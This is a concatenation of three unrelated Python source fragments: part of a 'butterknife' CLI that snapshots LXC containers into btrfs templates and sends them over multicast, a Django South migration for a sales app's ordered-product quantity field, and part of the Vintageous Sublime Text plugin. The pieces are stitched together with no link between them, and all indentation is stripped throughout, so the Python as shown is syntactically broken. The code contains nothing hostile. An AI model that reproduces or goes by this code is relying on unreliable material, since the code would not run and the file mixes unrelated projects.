print("Please create %s with following content: %s ALL=(ALL) NOPASSWD: /usr/bin/btrfs send /var/butterknife/pool/@template\\:*" % (sudoer, user))
exit(253)
print("Switching to user %s (uid=%d, gid=%d)" % (user, uid, gid))
os.setgid(gid)
os.setuid(uid)
elif os.getuid() == 0:
click.echo("Warning: running as root, this is not reccommended!")
httpd.serve_forever()
@click.command("receive", help="Receive subvolume over multicast")
@click.option("--pool", default="file:///var/butterknife/pool", help="Remote or local pool")
def multicast_receive(pool):
cmd = "udp-receiver", "--nokbd"
udpcast = subprocess.Popen(cmd, stdout=subprocess.PIPE)
pool = pool_factory(pool)
pool.receive(udpcast.stdout)
udpcast.wait()
@click.command("send", help="Send subvolume over multicast")
@click.argument("subvol")
@click.option("--pool", default="file:///var/butterknife/pool", help="Remote or local pool")
@click.option("-m", "--min-wait", default=5, help="Wait until t seconds since first receiver connection has passed")
def multicast_send(subvol, pool, min_wait):
pool = pool_factory(pool)
btrfs = pool.send(subvol)
cmd = "udp-sender", "--nokbd", "--no-progress", "--min-receivers", "1", "--min-wait", str(min_wait)
udpcast = subprocess.Popen(cmd, stdin=btrfs.stdout)
btrfs.wait()
@click.command("release", help="Snapshot a LXC container and release as Butterknife template")
@click.argument("name")
def lxc_release(name):
config = configparser.ConfigParser()
config.read('/etc/butterknife/butterknife.conf')
import lxc
container=lxc.Container(name)
if container.running:
print("Stopping container")
container.stop()
ROOTFS = container.get_config_item("lxc.rootfs")
assert os.path.isdir(ROOTFS), "No directory at %s" % ROOTFS
POSTDEPLOY_SCRIPTS = os.path.join(ROOTFS, "etc", "butterknife", "postdeploy.d")
assert os.path.isdir(POSTDEPLOY_SCRIPTS), "Postinstall scripts directory %s missing!" % POSTDEPLOY_SCRIPTS
config.read(os.path.join(ROOTFS, "etc/butterknife/butterknife.conf"))
if "template" not in config.sections():
config.add_section("template")
if "name" not in config["template"]:
config.set("template", name)
config.set("template", "endpoint", config.get("global", "endpoint"))
config.set("template", "namespace", config.get("global", "namespace"))
architecture = container.get_config_item("lxc.arch")
config.set("template", "architecture", architecture)
snapshot = container.snapshot()
config.set("template", "version", snapshot)
print("Created snapshot:", snapshot)
snapdir = os.path.join("/var/lib/lxcsnaps", name, snapshot)
cmd = "chroot", os.path.join(snapdir, "rootfs"), "/usr/local/bin/butterknife-prerelease"
print("Executing:", " ".join(cmd))
import subprocess
subprocess.call(cmd)
with open(os.path.join(snapdir, "rootfs/etc/butterknife/butterknife.conf"), "w") as fh:
config.write(fh)
cmd = "btrfs", "subvolume", "snapshot", "-r", os.path.join(snapdir, "rootfs"), \
"/var/butterknife/pool/@template:%(namespace)s.%(name)s:%(architecture)s:%(version)s" % config["template"]
print("Executing:", " ".join(cmd))
subprocess.call(cmd)
@click.command("list", help="Linux Containers that have been prepared for Butterknife")
def lxc_list():
import lxc
for name in lxc.list_containers():
container=lxc.Container(name)
rootfs = container.get_config_item("lxc.rootfs")
template_config = os.path.join(rootfs, "etc/butterknife/butterknife.conf")
if not os.path.exists(template_config):
continue
config = configparser.ConfigParser()
config.read('/etc/butterknife/butterknife.conf')
config.read(template_config)
if "template" not in config.sections():
config.add_section("template")
if "name" not in config["template"]:
config.set("template", "name", "?")
click.echo("%s --> @template:%s:%s:%s" % (name.ljust(40), config.get("global", "namespace"), config.get("template", "name"), container.get_config_item("lxc.arch")))
@click.command("clean", help="Clean incomplete transfers")
def pool_clean():
for path in os.listdir("/var/butterknife/pool"):
if not path.startswith("@template:"):
continue
try:
open(os.path.join("/var/butterknife/pool", path, ".test"), "w")
except OSError as e:
if e.errno == 30: # This is read-only, hence finished
continue
cmd = "btrfs", "subvol", "delete", os.path.join("/var/butterknife/pool", path)
click.echo("Executing: %s" % " ".join(cmd))
subprocess.check_output(cmd)
@click.command("release", help="Release systemd namespace as Butterknife template")
def nspawn_release():
raise NotImplementedError()
@click.command("list", help="systemd namespaces that have been prepared for Butterknife")
def nspawn_list():
raise NotImplementedError()
@click.command(help="Instantiate template (DANGEROUS!)")
def deploy():
raise NotImplementedError()
@click.group(help="Linux Containers interface")
def lxc(): pass
@click.group(help="systemd-nspawn interface")
def nspawn(): pass
@click.group(help="Receive or serve over multicast")
def multicast(): pass
multicast.add_command(multicast_receive)
multicast.add_command(multicast_send)
lxc.add_command(lxc_release)
lxc.add_command(lxc_list)
nspawn.add_command(nspawn_release)
nspawn.add_command(nspawn_list)
@click.group()
def entry_point(): pass
entry_point.add_command(serve)
entry_point.add_command(pool_clean)
entry_point.add_command(pull)
entry_point.add_command(push)
entry_point.add_command(list)
entry_point.add_command(multicast)
entry_point.add_command(lxc)
entry_point.add_command(nspawn)
entry_point.add_command(deploy)
| |
# encoding: utf-8
# Copyright 2013 maker
# License
import datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Changing field 'OrderedProduct.quantity'
db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=30, decimal_places=2))
def backwards(self, orm):
# Changing field 'OrderedProduct.quantity'
db.alter_column('sales_orderedproduct', 'quantity', self.gf('django.db.models.fields.DecimalField')(max_digits=4, decimal_places=2))
models = {
'auth.group': {
'Meta': {'object_name': 'Group'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '80'}),
'permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'})
},
'auth.permission': {
'Meta': {'ordering': "('content_type__app_label', 'content_type__model', 'codename')", 'unique_together': "(('content_type', 'codename'),)", 'object_name': 'Permission'},
'codename': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'content_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['contenttypes.ContentType']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '50'})
},
'auth.user': {
'Meta': {'object_name': 'User'},
'date_joined': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'email': ('django.db.models.fields.EmailField', [], {'max_length': '75', 'blank': 'True'}),
'first_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'groups': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Group']", 'symmetrical': 'False', 'blank': 'True'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_staff': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'is_superuser': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_login': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'last_name': ('django.db.models.fields.CharField', [], {'max_length': '30', 'blank': 'True'}),
'password': ('django.db.models.fields.CharField', [], {'max_length': '128'}),
'user_permissions': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['auth.Permission']", 'symmetrical': 'False', 'blank': 'True'}),
'username': ('django.db.models.fields.CharField', [], {'unique': 'True', 'max_length': '30'})
},
'contenttypes.contenttype': {
'Meta': {'ordering': "('name',)", 'unique_together': "(('app_label', 'model'),)", 'object_name': 'ContentType', 'db_table': "'django_content_type'"},
'app_label': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'model': ('django.db.models.fields.CharField', [], {'max_length': '100'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '100'})
},
'core.accessentity': {
'Meta': {'object_name': 'AccessEntity'},
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'})
},
'core.comment': {
'Meta': {'object_name': 'Comment'},
'author': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.User']", 'null': 'True', 'blank': 'True'}),
'body': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"})
},
'core.group': {
'Meta': {'ordering': "['name']", 'object_name': 'Group', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['core.Group']"})
},
'core.object': {
'Meta': {'object_name': 'Object'},
'comments': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'comments'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.Comment']"}),
'creator': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'objects_created'", 'null': 'True', 'to': "orm['core.User']"}),
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'dislikes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_disliked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'full_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_full_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'last_updated': ('django.db.models.fields.DateTimeField', [], {'auto_now': 'True', 'blank': 'True'}),
'likes': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_liked'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'links': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'links_rel_+'", 'null': 'True', 'to': "orm['core.Object']"}),
'nuvius_resource': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_name': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'object_type': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'read_access': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'objects_read_access'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.AccessEntity']"}),
'subscribers': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'subscriptions'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'tags': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Tag']", 'null': 'True', 'blank': 'True'}),
'trash': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'core.tag': {
'Meta': {'ordering': "['name']", 'object_name': 'Tag'},
'date_created': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'id': ('django.db.models.fields.AutoField', [], {'primary_key': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'})
},
'core.user': {
'Meta': {'ordering': "['name']", 'object_name': 'User', '_ormbases': ['core.AccessEntity']},
'accessentity_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.AccessEntity']", 'unique': 'True', 'primary_key': 'True'}),
'default_group': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'default_user_set'", 'null': 'True', 'to': "orm['core.Group']"}),
'disabled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'last_access': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'other_groups': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['core.Group']", 'null': 'True', 'blank': 'True'}),
'user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['auth.User']"})
},
'finance.account': {
'Meta': {'ordering': "['name']", 'object_name': 'Account', '_ormbases': ['core.Object']},
'balance': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'balance_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'balance_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'owner': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"})
},
'finance.category': {
'Meta': {'object_name': 'Category', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'finance.currency': {
'Meta': {'object_name': 'Currency', '_ormbases': ['core.Object']},
'code': ('django.db.models.fields.CharField', [], {'max_length': '3'}),
'factor': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '10', 'decimal_places': '4'}),
'is_active': ('django.db.models.fields.BooleanField', [], {'default': 'True'}),
'is_default': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '255'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'symbol': ('django.db.models.fields.CharField', [], {'max_length': '1', 'null': 'True', 'blank': 'True'})
},
'finance.liability': {
'Meta': {'ordering': "['-due_date']", 'object_name': 'Liability', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'due_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_liability_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'finance.tax': {
'Meta': {'object_name': 'Tax', '_ormbases': ['core.Object']},
'compound': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '4', 'decimal_places': '2'})
},
'finance.transaction': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'Transaction', '_ormbases': ['core.Object']},
'account': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Account']"}),
'category': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Category']", 'null': 'True', 'blank': 'True'}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'blank': 'True'}),
'liability': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Liability']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_source'", 'to': "orm['identities.Contact']"}),
'target': ('django.db.models.fields.related.ForeignKey', [], {'related_name': "'finance_transaction_target'", 'to': "orm['identities.Contact']"}),
'value': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'value_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'value_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'identities.contact': {
'Meta': {'ordering': "['name']", 'object_name': 'Contact', '_ormbases': ['core.Object']},
'contact_type': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.ContactType']"}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['identities.Contact']"}),
'related_user': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['core.AccessEntity']", 'null': 'True', 'blank': 'True'})
},
'identities.contactfield': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactField', '_ormbases': ['core.Object']},
'allowed_values': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'field_type': ('django.db.models.fields.CharField', [], {'max_length': '64'}),
'label': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'required': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'identities.contacttype': {
'Meta': {'ordering': "['name']", 'object_name': 'ContactType', '_ormbases': ['core.Object']},
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'fields': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['identities.ContactField']", 'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '256'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'slug': ('django.db.models.fields.CharField', [], {'max_length': '256'})
},
'sales.lead': {
'Meta': {'ordering': "['contact']", 'object_name': 'Lead', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_lead_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'contact_method': ('django.db.models.fields.CharField', [], {'max_length': '32'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.opportunity': {
'Meta': {'ordering': "['-expected_date']", 'object_name': 'Opportunity', '_ormbases': ['core.Object']},
'amount': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'amount_currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'amount_display': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_opportunity_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'closed_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'contact': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']"}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'expected_date': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'lead': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Lead']", 'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'probability': ('django.db.models.fields.DecimalField', [], {'null': 'True', 'max_digits': '3', 'decimal_places': '0', 'blank': 'True'}),
'products_interested': ('django.db.models.fields.related.ManyToManyField', [], {'to': "orm['sales.Product']", 'symmetrical': 'False'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']", 'null': 'True', 'blank': 'True'}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"})
},
'sales.orderedproduct': {
'Meta': {'ordering': "['product']", 'object_name': 'OrderedProduct', '_ormbases': ['core.Object']},
'description': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'discount': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '4', 'decimal_places': '2'}),
'fulfilled': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'order': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleOrder']"}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']"}),
'quantity': ('django.db.models.fields.DecimalField', [], {'default': '1', 'max_digits': '30', 'decimal_places': '2'}),
'rate': ('django.db.models.fields.DecimalField', [], {'max_digits': '20', 'decimal_places': '2'}),
'rate_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'subscription': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Subscription']", 'null': 'True', 'blank': 'True'}),
'tax': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Tax']", 'null': 'True', 'blank': 'True'})
},
'sales.product': {
'Meta': {'ordering': "['code']", 'object_name': 'Product', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'buy_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'code': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'parent': ('django.db.models.fields.related.ForeignKey', [], {'blank': 'True', 'related_name': "'child_set'", 'null': 'True', 'to': "orm['sales.Product']"}),
'product_type': ('django.db.models.fields.CharField', [], {'default': "'good'", 'max_length': '32'}),
'runout_action': ('django.db.models.fields.CharField', [], {'max_length': '32', 'null': 'True', 'blank': 'True'}),
'sell_price': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'stock_quantity': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'}),
'supplier': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'supplier_code': ('django.db.models.fields.IntegerField', [], {'null': 'True', 'blank': 'True'})
},
'sales.saleorder': {
'Meta': {'ordering': "['-datetime']", 'object_name': 'SaleOrder', '_ormbases': ['core.Object']},
'assigned': ('django.db.models.fields.related.ManyToManyField', [], {'blank': 'True', 'related_name': "'sales_saleorder_assigned'", 'null': 'True', 'symmetrical': 'False', 'to': "orm['core.User']"}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'currency': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['finance.Currency']"}),
'datetime': ('django.db.models.fields.DateTimeField', [], {'default': 'datetime.datetime.now'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'opportunity': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Opportunity']", 'null': 'True', 'blank': 'True'}),
'payment': ('django.db.models.fields.related.ManyToManyField', [], {'symmetrical': 'False', 'to': "orm['finance.Transaction']", 'null': 'True', 'blank': 'True'}),
'reference': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'source': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleSource']"}),
'status': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.SaleStatus']"}),
'total': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'}),
'total_display': ('django.db.models.fields.DecimalField', [], {'default': '0', 'max_digits': '20', 'decimal_places': '2'})
},
'sales.salesource': {
'Meta': {'ordering': "('-active', 'name')", 'object_name': 'SaleSource', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'})
},
'sales.salestatus': {
'Meta': {'ordering': "('hidden', '-active', 'name')", 'object_name': 'SaleStatus', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'details': ('django.db.models.fields.TextField', [], {'null': 'True', 'blank': 'True'}),
'hidden': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'name': ('django.db.models.fields.CharField', [], {'max_length': '512'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'use_leads': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_opportunities': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'use_sales': ('django.db.models.fields.BooleanField', [], {'default': 'False'})
},
'sales.subscription': {
'Meta': {'ordering': "['expiry']", 'object_name': 'Subscription', '_ormbases': ['core.Object']},
'active': ('django.db.models.fields.BooleanField', [], {'default': 'False'}),
'client': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['identities.Contact']", 'null': 'True', 'blank': 'True'}),
'cycle_end': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'cycle_period': ('django.db.models.fields.CharField', [], {'default': "'month'", 'max_length': '32'}),
'details': ('django.db.models.fields.CharField', [], {'max_length': '512', 'null': 'True', 'blank': 'True'}),
'expiry': ('django.db.models.fields.DateField', [], {'null': 'True', 'blank': 'True'}),
'object_ptr': ('django.db.models.fields.related.OneToOneField', [], {'to': "orm['core.Object']", 'unique': 'True', 'primary_key': 'True'}),
'product': ('django.db.models.fields.related.ForeignKey', [], {'to': "orm['sales.Product']", 'null': 'True', 'blank': 'True'}),
'start': ('django.db.models.fields.DateField', [], {'default': 'datetime.datetime.now'})
}
}
complete_apps = ['sales']
| |
import sublime
import sublime_plugin
from Vintageous.state import IrreversibleTextCommand
from Vintageous.state import VintageState
from Vintageous.vi import utils
from Vintageous.vi.constants import _MODE_INTERNAL_NORMAL
from Vintageous.vi.constants import MODE_INSERT
from Vintageous.vi.constants import MODE_NORMAL
from Vintageous.vi.constants import MODE_VISUAL
from Vintageous.vi.constants import MODE_VISUAL_LINE
from Vintageous.vi.constants import regions_transformer
from Vintageous.vi.registers import REG_EXPRESSION
class ViEditAtEol(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
state = VintageState(self.view)
state.enter_insert_mode()
self.view.run_command('collapse_to_direction')
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
hard_eol = self.view.line(s.b).end()
new_sels.append(sublime.Region(hard_eol, hard_eol))
for s in new_sels:
self.view.sel().add(s)
class ViEditAfterCaret(sublime_plugin.TextCommand):
def run(self, edit, extend=False):
state = VintageState(self.view)
state.enter_insert_mode()
visual = self.view.has_non_empty_selection_region()
sels = list(self.view.sel())
self.view.sel().clear()
new_sels = []
for s in sels:
if visual:
new_sels.append(sublime.Region(s.end(), s.end()))
else:
if not utils.is_at_eol(self.view, s):
new_sels.append(sublime.Region(s.end() + 1, s.end() + 1))
else:
new_sels.append(sublime.Region(s.end(), s.end()))
for s in new_sels:
self.view.sel().add(s)
